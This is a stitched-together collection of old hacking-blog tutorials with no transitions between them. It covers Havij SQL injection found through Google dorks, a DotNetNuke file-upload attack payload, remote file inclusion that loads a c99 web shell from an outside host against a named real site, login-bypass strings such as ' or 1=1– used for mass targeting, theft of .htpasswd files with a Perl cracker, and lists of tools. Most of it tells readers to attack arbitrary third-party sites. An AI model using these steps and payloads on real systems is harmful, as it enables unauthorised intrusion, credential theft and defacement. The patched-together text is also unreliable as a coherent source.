SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

• You can download havij from here.
• We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

• Just search google using one of the dork and you will see a lot of vulnerable websites.
• Open any one of the website than put  ‘ after the link look:

• If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.

  

• Now open Havij and paste the link without ‘

  

  

• Now we have to find the columns of the database.

  

  

• After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on Cracking MD5.

• After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.
• Now you may login as the admin user and control the website as you want.
• H@ppy H@cking

Video Tutorial

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.

Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Below are the easy steps to implement the attack:

• First use a google dork to find the appropriate target.

inurl:”/portals/0″ site:.com

• You can change com to your desired domain name like bd ph ae
• Now search your website on the google after searching you will get many websites choose any one of it.

• Its time to check the required vulnerability on the website just place this code after the web address.

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• For example if you got www.victim.com
• Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• If you will get this screen means this web is going to hack.

• Now choose the third option “A File On Your Site” And than paste this java code on your address bar.

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

• It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.

• After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension

here extension is txt jpg swf etc.

• In our case

www.victim.com/portals/0/b.txt

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.

Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly  use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/rafaybaloch/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

About the Author

This is a guest post by Rafay baloch. Rafay Baloch is a the founder of Rafay Hacking Articles and the writer of the book A Beginners Guide To Ethical Hacking

While the adoption of web applications for conducting online business has enabled companies to connect seamlessly with their customers, it has also exposed a number of security concerns stemming from improper coding. Vulnerabilities in web applications allow hackers to gain direct and public access to sensitive information (e.g. personal data, login credentials).

Web applications allow visitors to submit and retrieve data to/from a database over the Internet. Databases are the heart of most web applications. They hold data needed for web applications to deliver specific content to visitors and provide information to customers, suppliers etc.

SQL Injection is perhaps the most common web-application hacking technique which attempts to pass SQL commands through a web application for execution by the back-end database. The vulnerability is presented when user input is incorrectly sanitized and thereby executed.

Checking for SQL Injection vulnerabilities involves auditing your web applications and the best way to do it is by using automated SQL Injection Scanners. We’ve compiled a list of free SQL Injection Scanners we believe will be of a value to both web application developers and professional security auditors.

SQLIer – SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.

SQLbftools – SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.

SQL Injection Brute-forcer – SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.

SQLBrute – SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.

BobCat – BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.

SQLMap – SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.

Absinthe – Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.

SQL Injection Pen-testing Tool – The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.

SQID – SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.

Blind SQL Injection Perl Tool – bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.

SQL Power Injection Injector – SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.

FJ-Injector Framwork – FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.

SQLNinja – SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.

Automagic SQL Injector – The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Get Automagic SQL Injector.

NGSS SQL Injector – NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

or

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

As a result of a lot of requests for the list of SQL Injection String and due to lack of time on our behalf to respond to your Comments we have now decided to give the download link for the list of SQL Injection Strings. Now you just need to Subscribe to our RSS Feed via Email and get the Download link at the bottom of the Confirmation Email. Please don’t Forget to click on the Confirmation Link given in that Email.

Here is the form to Subscribe to our RSS feed via Email:

Happy Hunting

Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to find a web host that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net

1. phpproxy

Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.

You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess

The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
[eminimall]
2. cgiproxy

Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.

First, download the source and unpack it to a local directory.

Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.

After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)

3. What is being blocked ?

a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.

I m considering writing a series of guides which for now I m calling “Hungry Hackers Guide”. i do have my malicious streaks (mainly on my own stuff though, I enjoy breaking my own machines), but I am mostly white hat. I guess these guide will basically aim to give white hat hackers a security lecture from a black hat perspective. i dunno. *shrugs*

Basic access control in apache

At it’s most basic level, access control in apache is specified in the httpd.conf (or equivalent file. these were previously three files, now merged into one for simplicity’s sake). the most basic directives are allow from and deny from. the default permissions for any given directory is allow from all (which will allow any client to get pages from that directory).

the format for these directives is as follows:

<Directory /> Order Deny,Allow Deny from All </Directory>

This will disallow any client from retrieving any file on your server, unless you explicitly allow files further up the tree. However, since sometimes normal users will want to control their own web directories, and it’s impractical (at least, at most, unsafe) to allow webmasters to modify the httpd.conf, we can specify to allow users to override certain directives using the allowoverride directive.

Allow override

Allowoverride (as stated above) allows non-root users to override access controls on a directory. you simply specify which directives you want the user to be able to override (the default is everything), and then apache looks in each directory for a .htaccess file (or other, specified with the AccessFilename directive) and applies the contents of that to it’s access control.

Part of the access control, the part which we will be covering (given the scope of this document) is the authconfig directives. below we’ll view a typical .htaccess file for most sites with moderate to poor security (most porn sites simply use these, porn sites can actually be great practice to crack passwords).

/* a typical .htaccess file */ AuthName "Marvin Martian's Porn Emporium" AuthType Basic AuthUserFile /home/marvin/public_html/members/.htpasswd require valid-user

As you can see above, there aren’t many directives required to provide password protection to a directory. as you can see, in this case, the webmaster has been pretty lazy and stuck the .htpasswd file inside the same directory. the format of the .htpasswd file is simple: <user>:<encryptedpassword>

[eminimall]

A Bad case

On a poorly secured server, there are no access restrictions on the .htpasswd file. since the .htpasswd file is in a web-accessible directory, and user which is able to authenticate to the directory is able to obtain the password list.

Simply enter the url /members/.htpasswd, and you should receive a full userlist as well as all the encrypted passwords. very silly indeed. if the file doesn’t exist, on a poorly configured server one merely has to read the .htaccess file to obtain the location. if it is below the “web-root”, then it would require a cgi-exploit of some sort to obtain the file. but on any other directory, simply use the browser to obtain the file:

webmaster:TTn.VQRliM8c2 hornyguy:ZpgNeARi106aM fatmike69:drXj18zVxxBVc

Unfortunately, these passwords aren’t of much use in their current form. they require cracking.

Cracking Passwords

Most unix passwords are encrypted using a “one way hash” or “trapdoor hash” – which entails actually losing data from the password in such a way that the original password simply cannot be obtained by reversing the algorithm.

The only way to crack such passwords is using brute force guessing attacks. a simple perl script can be used to achieve this:

#! /usr/bin/perl # crack.pl by fwaggle <root@fwaggle.net> open (PASSFILE, ".htpasswd"); my @passfile = <PASSFILE>; close PASSFILE; open (DICTFILE, "dictionary.txt"); my @dictfile = <DICTFILE>; close DICTFILE; foreach $line (@passfile) { my ($username, $encpass) = split(/:/, $line); foreach $attempt (@dictfile) { if ($encpass eq crypt($attempt, $encpass)) { print("Cracked: ${username}:${attempt}\n"); } } }

The above perl script is a simple brute force password cracker. it may or may not work, i didn’t actually test it before writing this article – but it closely resembles one i released to alt.hacking quite a while ago. whether it works or not, you should hopefully be able to see the process which password cracking requires (even for perl, the syntax is almost plain english).

[eminimall]

Better Cracking Performance

Perl isn’t the quickest of languages, and using the standard crypt() calls aren’t exactly optimized for high speed cracking. a far better solution is to download a purpose-built, c coded password cracker such as john the ripper. john the ripper is optimized to crack passwords extra fast, as well as it includes an “incremental mode” in case your dictionary should fail to crack a password. ie, in the above example, if the user’s password doesn’t happen to be in the dictionary, then you won’t be able to crack it.

Using an incremental password cracker, every character combination is tried, in an intelligent order (in a vain attempt to save time in something that is wholely unpredictable), so that absolutely any password will be cracked, eventually.

The one problem with john the ripper is that it’s picky about the files that it gets inputted. in order to crack the .htpasswd files, you must edit them to make them appear like regular unix /etc/passwd files. this means adding extra fields, like this:

<username>:<password>:1:1:user:/bin/sh:/root

for example, the entries above could look like this:

webmaster:TTn.VQRliM8c2:1:1:webmaster:/bin/sh:/root hornyguy:ZpgNeARi106aM:3:3:hornyguy:/bin/sh:/root fatmike69:drXj18zVxxBVc:3:3:hornyguy:/bin/sh:/root

The windows version doesn’t seem to require this for some reason, so you can just feed it a regular .htpasswd file. note that the windows version may have markedly poor performance when compared to the unix versions.

Finding vulnerable servers

Now that we’ve discussed how to break these passwords, it’s almost time to talk about securing them. if you’re only interested in hax0ring passwords from sites, chances are you’re probably well equipped to crack any password files you might stumble accross. if you’re just looking to hack anything, try searching in google or altavista for a phrase like .htpass, and wade through the results and see if you find a file that says “Index of /something” that contains a .htpasswd file.

if you have permission to read the file, you’ve basically hacked it already. this is admittedly a lame hack, but if you’re bored – do the net in general a favour. crack the passwords, and email them to the admin. that’s all i ever used to do, and you get the same sense of achievement and hacker cred, without the legal problems of defacements.

on a side note, the same results can be achieved by searching for service.pwd. this is the password file for fp-apache, the frontpage server extensions for apache. some really lame admins don’t check permissions on this file, and you can easily gain access to these kinds of systems (and if you’re feeling particularly malicious, just connect with a frontpage client and upload a defacement).

Putting an end to this Nonsense

if you’re running your own site, then here’s the section you’ll really be interested in – stopping someone from doing this to you. the first thing you need to do is prevent users from reading your .ht* files. the easiest way to hinder this is to put the .htpasswd file someplace that’s not web-accessible (such as your home dir, out of ~/public_html).

the next step, as an admin of a server, is to prevent apache from serving these pages from the web. there is no (i repeat NO) reason that a web client should ever need to see these pages, they are for server side configuration only.

so, we can easily accomplish this using the <Files> directive, and a niftylittle regular expression:

<Files ~ "^\.ht"> Order allow,deny Deny from all </Files>

this particular example (taken from apache’s httpd.conf, now thankfully included in default distributions to keep lame admins from unknowingly putting themselves at risk) prevents the server from serving any files that begin with .ht. thus, .htaccess and .htpasswd are both protected.

the final step from here is to ensure that the files are protected on the server – meaning file permissions. the ideal situation is to have suEXEC for apache running, and to have the files accessible only by the httpd (but still owned by you). that way, you can chmod the files when you need to edit them, but cgi exploits will not allow users to read the files.

Wrapping it up

well, this concludes my little rant about .htpasswd and .htaccess files. hopefully you learnt something from this. comments are always welcome, just email me. also, if you’re looking for a unix/unix-like irc channel to lurk on, come on my irc network (irc.mooircd.org) and join #hackerzlair – it’s lag free, packet kiddie free, and quite nice.

That about does it I think. Maybe I’ll write some more of these files if I think about it.

1. Nmap
A versatile port scanner , has got lot of scanning options. Can perform a variety of scan (syn , fin ,ack etc.)
Not very fast but is very accurate
also can detect host OS

2. Superscan -
Fastest port scanner i’v seen
Can scan tcp/udp ports . also has many network utilities like ping ,tracerouts, whois etc.

3 Angry Ip Scanner
Angry IP Scanner can perform basic host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with plugins

4.Unicorn Scan
Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses. Like Scanrand, it isn’t for the faint of heart.

5 Scanrand
An unusually fast stateless network service and topology discovery system
Scanrand is a stateless host-discovery and port-scanner similar in design to Unicornscan. It trades off reliability for amazingly fast speeds and uses cryptographic techniques to prevent attackers from manipulating scan results.

1. nmap – Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto – Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap – Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal – Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra – Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework – The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper – John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus – Nessus is the world’s most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world’s largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS – Internetwork Routing Protocol Attack Suite – Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack – RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.